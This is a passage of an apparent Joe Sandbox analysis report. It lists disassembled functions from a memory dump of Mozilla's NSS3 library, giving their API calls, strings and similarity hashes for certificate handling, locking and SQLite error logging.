                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2661B2B5A01201ABEF11DE65DC41FAB76B9EF14748F084428EE0AAAB52F731D914C7F1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C3D8B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C3D9F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C3DCA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3DE2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4C3E4F
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C3E97
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C3EAB
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C3ED6
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3EEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2554137219-0
                                                                                                                                                                                                                                                      • Opcode ID: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                                                      • Instruction ID: 48a1bf3b4a1d10d8a348e3903475fae31ad35f6412a06c5e2ca806bcb38ec5f5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78512579B006109FEB01EF69DC44FA673B4AF45319F060528DE095BB22EB31E944CBD2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(FA71756D), ref: 6C472C5D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0D30: calloc.MOZGLUE ref: 6C4D0D50
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0D30: TlsGetValue.KERNEL32 ref: 6C4D0D6D
                                                                                                                                                                                                                                                      • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C472C8D
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C472CE0
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: TlsGetValue.KERNEL32 ref: 6C472E4E
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PL_HashTableLookup.NSS3(?), ref: 6C472E71
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PL_HashTableRemove.NSS3(?), ref: 6C472E84
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
                                                                                                                                                                                                                                                        • Part of subcall function 6C472E00: PR_Unlock.NSS3 ref: 6C472EA9
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C472D23
                                                                                                                                                                                                                                                      • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C472D30
                                                                                                                                                                                                                                                      • CERT_MakeCANickname.NSS3(00000001), ref: 6C472D3F
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C472D73
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C472DB8
                                                                                                                                                                                                                                                      • free.MOZGLUE ref: 6C472DC8
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: PL_FreeArenaPool.NSS3 ref: 6C473F14
                                                                                                                                                                                                                                                        • Part of subcall function 6C473E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3941837925-0
                                                                                                                                                                                                                                                      • Opcode ID: af7c2316c3ee55d2d1559e91796230fb5a9e4525cac7cfe1339b6c8d0a67fed8
                                                                                                                                                                                                                                                      • Instruction ID: 3522171bff8407541051e41f7df236291e4f320a610454ec27a29fc41b0218e5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af7c2316c3ee55d2d1559e91796230fb5a9e4525cac7cfe1339b6c8d0a67fed8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A751CD71A04212DFEB30DE29DD88F9B77E5EF94209F15042CE85997710EB31E8158BE2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C477CFD
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6C599030), ref: 6C477D1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,6C599048), ref: 6C477D2F
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C477D50
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C477D61
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C477D7D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C477D9C
                                                                                                                                                                                                                                                      • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C477DB8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C477E19
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 70581797-0
                                                                                                                                                                                                                                                      • Opcode ID: 78b61701848ebc833fec4ac39f48eb2b5065354f29128f8a6c5f5434c849bd51
                                                                                                                                                                                                                                                      • Instruction ID: 01b22feebc8c20d636def9af56bb492de22723d514110722c13da409644a13c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78b61701848ebc833fec4ac39f48eb2b5065354f29128f8a6c5f5434c849bd51
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41E372A0411A9BEB21DE699D41FEF37A8EF4035DF450128EC19A7B50E730ED1986F1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F15
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C4880DD), ref: 6C487F36
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C4880DD), ref: 6C487F3D
                                                                                                                                                                                                                                                      • SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C4880DD), ref: 6C487F5D
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6C4880DD), ref: 6C487F94
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C487F9B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08B,00000000,6C4880DD), ref: 6C487FD0
                                                                                                                                                                                                                                                      • PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C4880DD), ref: 6C487FE6
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6C4880DD), ref: 6C48802D
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4037168058-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4CFF00
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF18
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4CFF26
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4CFF4F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4CFF7A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C4CFF8C
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1233137751-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E27
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C417E67
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C417EED
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417F2E
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFD7A
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFD94
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FFE3C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FFE83
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C3FFEFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C3FFF3B
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C542FFD
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C543007
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C543032
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C543073
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C5430B3
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C5430C0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C5430BB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                                                      • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                                                      • API String ID: 750880481-4279182443
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]Ll), ref: 6C4C5F0A
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5F1F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(89000904), ref: 6C4C5F2F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(890008E8), ref: 6C4C5F55
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C5F6D
                                                                                                                                                                                                                                                      • SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C4C5F7D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C4C5F82,8B4274C0), ref: 6C4C5248
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: EnterCriticalSection.KERNEL32(0F6C590D,?,6C4C5F82,8B4274C0), ref: 6C4C525C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: PR_SetError.NSS3(00000000,00000000), ref: 6C4C528E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: PR_Unlock.NSS3(0F6C58F1), ref: 6C4C5299
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5220: free.MOZGLUE(00000000), ref: 6C4C52A9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
                                                                                                                                                                                                                                                      • String ID: q]Ll
                                                                                                                                                                                                                                                      • API String ID: 3150690610-2389411964
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,?,6C49124D,00000001), ref: 6C488D19
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C49124D,00000001), ref: 6C488D32
                                                                                                                                                                                                                                                      • PL_ArenaRelease.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D73
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488D8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C49124D,00000001), ref: 6C488DBA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                      • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                      • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                      • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Fl,?,?,6C464E1D), ref: 6C561C8A
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C561CB6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                      • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Fl
                                                                                                                                                                                                                                                      • API String ID: 1840970956-1300945822
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544DC3
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544DE0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544DCB
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C544DDA
                                                                                                                                                                                                                                                      • invalid, xrefs: 6C544DB8
                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C544DBD
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C544DD5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544E30
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544E4D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544E38
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C544E47
                                                                                                                                                                                                                                                      • invalid, xrefs: 6C544E25
                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C544E2A
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C544E42
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                      • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C47A086
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C47A09B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C47A0B7
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A0E9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C47A11B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C47A12F
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C47A148
